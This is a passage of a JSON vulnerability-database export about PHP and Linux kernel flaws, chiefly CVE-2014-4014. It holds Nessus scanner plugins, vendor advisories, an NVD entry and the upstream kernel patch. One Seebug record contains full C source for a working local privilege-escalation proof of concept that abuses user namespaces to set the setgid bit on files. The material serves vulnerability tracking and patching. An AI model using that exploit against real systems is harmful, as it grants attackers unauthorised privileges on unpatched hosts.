reference:\"php5-dom-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dom-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-enchant-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-exif-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fastcgi-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fastcgi-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fileinfo-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-fpm-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ftp-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gd-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gettext-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-gmp-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-iconv-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-imap-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-intl-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-json-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ldap-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mbstring-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mcrypt-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mssql-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-mysql-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-odbc-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-openssl-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pcntl-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pdo-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pear-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pgsql-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-phar-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-phar-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-posix-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-pspell-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-readline-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-shmop-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-snmp-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-soap-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sockets-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sqlite-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-suhosin-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvmsg-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvsem-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-sysvshm-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tidy-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-tokenizer-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-wddx-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlreader-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlrpc-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xmlwriter-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-xsl-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zip-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-zlib-debuginfo-5.3.8-4.18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:09", "bulletinFamily": "scanner", "description": "The 3.13.11 stable kernel update contains a number of important fixes across the tree. The 3.13.10 stable update contains a number of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-5609.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73872", "published": "2014-05-06T00:00:00", "title": "Fedora 19 : kernel-3.13.11-100.fc19 (2014-5609)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5609.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73872);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-0155\", \"CVE-2014-2851\");\n script_bugtraq_id(66688, 66779);\n script_xref(name:\"FEDORA\", value:\"2014-5609\");\n\n script_name(english:\"Fedora 19 : kernel-3.13.11-100.fc19 (2014-5609)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.13.11 stable kernel update contains a number of important fixes\nacross the tree. The 3.13.10 stable update contains a number of\nimportant fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1081589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1086730\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04ee5d0c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"kernel-3.13.11-100.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2017-10-12T02:11:07", "bulletinFamily": "software", "description": " \n\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root. ([CVE-2014-4014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4014>)) \n\n\nImpact \n\n\nNone. No F5 products are affected by this vulnerability. \n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:19:00", "published": "2014-10-09T21:50:00", "id": "F5:K15677", "href": "https://support.f5.com/csp/article/K15677", "title": "Linux kernel vulnerability CVE-2014-4014", "type": "f5", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:58", "bulletinFamily": "software", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-10-09T00:00:00", "published": "2014-10-09T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15677.html", "id": "SOL15677", "title": "SOL15677 - Linux kernel vulnerability CVE-2014-4014", "type": "f5", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:03", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\narch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the sep CPU feature flag is set, allows local users to cause a denial of service (OOPS and system crash) via an invalid syscall number, as demonstrated by number 1000. \n\nArray index error in the aio_read_events_ring function in fs/aio.c in the Linux kernel through 3.15.1 allows local users to obtain sensitive information from kernel memory via a large head value.\n\nThe capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.\n\n** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. NOTE: the author of the LZO algorithms says \"the Linux kernel is *not* affected; media hype.\" \n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-devel-3.10.48-55.140.amzn1.i686 \n perf-debuginfo-3.10.48-55.140.amzn1.i686 \n kernel-3.10.48-55.140.amzn1.i686 \n kernel-headers-3.10.48-55.140.amzn1.i686 \n kernel-debuginfo-3.10.48-55.140.amzn1.i686 \n perf-3.10.48-55.140.amzn1.i686 \n kernel-debuginfo-common-i686-3.10.48-55.140.amzn1.i686 \n \n noarch: \n kernel-doc-3.10.48-55.140.amzn1.noarch \n \n src: \n kernel-3.10.48-55.140.amzn1.src \n \n x86_64: \n kernel-debuginfo-3.10.48-55.140.amzn1.x86_64 \n kernel-headers-3.10.48-55.140.amzn1.x86_64 \n kernel-3.10.48-55.140.amzn1.x86_64 \n kernel-devel-3.10.48-55.140.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.10.48-55.140.amzn1.x86_64 \n perf-debuginfo-3.10.48-55.140.amzn1.x86_64 \n perf-3.10.48-55.140.amzn1.x86_64 \n \n \n", "modified": "2014-09-19T10:33:00", "published": "2014-09-19T10:33:00", "id": "ALAS-2014-368", "href": "https://alas.aws.amazon.com/ALAS-2014-368.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:55:53", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87007", "id": "SSV:87007", "title": "Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)", "type": "seebug", "sourceData": "\n /**\r\n * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC\r\n *\r\n * Vitaly Nikolenko\r\n * http://hashcrack.org\r\n *\r\n * Usage: ./poc [file_path]\r\n * \r\n * where file_path is the file on which you want to set the sgid bit\r\n */\r\n#define _GNU_SOURCE\r\n#include <sys/wait.h>\r\n#include <sched.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <string.h>\r\n#include <assert.h>\r\n\r\n#define STACK_SIZE (1024 * 1024)\r\nstatic char child_stack[STACK_SIZE];\r\n\r\nstruct args {\r\n int pipe_fd[2];\r\n char *file_path;\r\n};\r\n\r\nstatic int child(void *arg) {\r\n struct args *f_args = (struct args *)arg;\r\n char c;\r\n\r\n // close stdout\r\n close(f_args->pipe_fd[1]); \r\n\r\n assert(read(f_args->pipe_fd[0], &c, 1) == 0);\r\n\r\n // set the setgid bit\r\n chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n pid_t pid;\r\n char mapping[1024];\r\n char map_file[PATH_MAX];\r\n struct args f_args;\r\n\r\n assert(argc == 2);\r\n\r\n f_args.file_path = argv[1];\r\n // create a pipe for synching the child and parent\r\n assert(pipe(f_args.pipe_fd) != -1);\r\n\r\n pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);\r\n assert(pid != -1);\r\n\r\n // get the current uid outside the namespace\r\n snprintf(mapping, 1024, "0 %d 1\\n", getuid()); \r\n\r\n // update uid and gid maps in the child\r\n snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);\r\n fd = open(map_file, O_RDWR); assert(fd != -1);\r\n\r\n assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));\r\n close(f_args.pipe_fd[1]);\r\n\r\n assert (waitpid(pid, NULL, 0) != -1);\r\n}\r\n\n ", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87007"}], "cve": [{"lastseen": "2018-12-19T12:01:18", "bulletinFamily": "NVD", "description": "The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.", "modified": "2018-12-18T09:31:37", "published": "2014-06-23T07:21:17", "id": "CVE-2014-4014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4014", "title": "CVE-2014-4014", "type": "cve", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nThe internal function inode_capable was used inappropriately.\r\nDepending on configuration, this may be usable to escalate privileges.\r\nA cursory inspection of my Fedora box suggests that it is not\r\nvulnerable to the obvious way to exploit this bug.\r\n\r\nThe fix should appear in Linus' -master shortly, and it's tagged for\r\nstable. In the mean time, I've attached it here.\r\n\r\nI'll follow up in a day or two with a description of the actual bug,\r\nor one of you can try to beat me to it.\r\n\r\n--Andy\r\n\r\n\r\n0001-fs-userns-Change-inode_capable-to-capable_wrt_inode_.patch\r\n\r\nFrom fc8ad6759de122ee180a02c16518c2e252cc9d48 Mon Sep 17 00:00:00 2001\r\nMessage-Id: <fc8ad6759de122ee180a02c16518c2e252cc9d48.1402429263.git.luto@amacapital.net>\r\nFrom: Andy Lutomirski <luto@amacapital.net>\r\nDate: Tue, 10 Jun 2014 12:35:26 -0700\r\nSubject: [PATCH v3] fs,userns: Change inode_capable to capable_wrt_inode_uidgid\r\n\r\nThe kernel has no concept of capabilities with respect to inodes; inodes\r\nexist independently of namespaces. For example,\r\ninode_capable(inode, CAP_LINUX_IMMUTABLE) would be nonsense.\r\n\r\nThis patch changes inode_capable to check for uid and gid mappings and\r\nrenames it to capable_wrt_inode_uidgid, which should make it more\r\nobvious what it does.\r\n\r\nFixes CVE-2014-4014.\r\n\r\nCc: Theodore Ts'o <tytso@mit.edu>\r\nCc: Serge Hallyn <serge.hallyn@ubuntu.com>\r\nCc: "Eric W. Biederman" <ebiederm@xmission.com>\r\nCc: Dave Chinner <david@fromorbit.com>\r\nCc: stable@vger.kernel.org\r\nSigned-off-by: Andy Lutomirski <luto@amacapital.net>\r\n---\r\n fs/attr.c | 8 ++++----\r\n fs/inode.c | 10 +++++++---\r\n fs/namei.c | 11 ++++++-----\r\n fs/xfs/xfs_ioctl.c | 2 +-\r\n include/linux/capability.h | 2 +-\r\n kernel/capability.c | 20 ++++++++------------\r\n 6 files changed, 27 insertions(+), 26 deletions(-)\r\n\r\ndiff --git a/fs/attr.c b/fs/attr.c\r\nindex 5d4e59d..6530ced 100644\r\n--- a/fs/attr.c\r\n+++ b/fs/attr.c\r\n@@ -50,14 +50,14 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr)\r\n \tif ((ia_valid & ATTR_UID) &&\r\n \t (!uid_eq(current_fsuid(), inode->i_uid) ||\r\n \t !uid_eq(attr->ia_uid, inode->i_uid)) &&\r\n-\t !inode_capable(inode, CAP_CHOWN))\r\n+\t !capable_wrt_inode_uidgid(inode, CAP_CHOWN))\r\n \t\treturn -EPERM;\r\n \r\n \t/* Make sure caller can chgrp. */\r\n \tif ((ia_valid & ATTR_GID) &&\r\n \t (!uid_eq(current_fsuid(), inode->i_uid) ||\r\n \t (!in_group_p(attr->ia_gid) && !gid_eq(attr->ia_gid, inode->i_gid))) &&\r\n-\t !inode_capable(inode, CAP_CHOWN))\r\n+\t !capable_wrt_inode_uidgid(inode, CAP_CHOWN))\r\n \t\treturn -EPERM;\r\n \r\n \t/* Make sure a caller can chmod. */\r\n@@ -67,7 +67,7 @@ int inode_change_ok(const struct inode *inode, struct iattr *attr)\r\n \t\t/* Also check the setgid bit! */\r\n \t\tif (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :\r\n \t\t\t\tinode->i_gid) &&\r\n-\t\t !inode_capable(inode, CAP_FSETID))\r\n+\t\t !capable_wrt_inode_uidgid(inode, CAP_FSETID))\r\n \t\t\tattr->ia_mode &= ~S_ISGID;\r\n \t}\r\n \r\n@@ -160,7 +160,7 @@ void setattr_copy(struct inode *inode, const struct iattr *attr)\r\n \t\tumode_t mode = attr->ia_mode;\r\n \r\n \t\tif (!in_group_p(inode->i_gid) &&\r\n-\t\t !inode_capable(inode, CAP_FSETID))\r\n+\t\t !capable_wrt_inode_uidgid(inode, CAP_FSETID))\r\n \t\t\tmode &= ~S_ISGID;\r\n \t\tinode->i_mode = mode;\r\n \t}\r\ndiff --git a/fs/inode.c b/fs/inode.c\r\nindex f96d2a6..d2fb2f2 100644\r\n--- a/fs/inode.c\r\n+++ b/fs/inode.c\r\n@@ -1839,14 +1839,18 @@ EXPORT_SYMBOL(inode_init_owner);\r\n * inode_owner_or_capable - check current task permissions to inode\r\n * @inode: inode being checked\r\n *\r\n- * Return true if current either has CAP_FOWNER to the inode, or\r\n- * owns the file.\r\n+ * Return true if current either has CAP_FOWNER in a namespace with the\r\n+ * inode owner uid mapped, or owns the file.\r\n */\r\n bool inode_owner_or_capable(const struct inode *inode)\r\n {\r\n+\tstruct user_namespace *ns;\r\n+\r\n \tif (uid_eq(current_fsuid(), inode->i_uid))\r\n \t\treturn true;\r\n-\tif (inode_capable(inode, CAP_FOWNER))\r\n+\r\n+\tns = current_user_ns();\r\n+\tif (ns_capable(ns, CAP_FOWNER) && kuid_has_mapping(ns, inode->i_uid))\r\n \t\treturn true;\r\n \treturn false;\r\n }\r\ndiff --git a/fs/namei.c b/fs/namei.c\r\nindex 8016827..985c6f3 100644\r\n--- a/fs/namei.c\r\n+++ b/fs/namei.c\r\n@@ -332,10 +332,11 @@ int generic_permission(struct inode *inode, int mask)\r\n \r\n \tif (S_ISDIR(inode->i_mode)) {\r\n \t\t/* DACs are overridable for directories */\r\n-\t\tif (inode_capable(inode, CAP_DAC_OVERRIDE))\r\n+\t\tif (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))\r\n \t\t\treturn 0;\r\n \t\tif (!(mask & MAY_WRITE))\r\n-\t\t\tif (inode_capable(inode, CAP_DAC_READ_SEARCH))\r\n+\t\t\tif 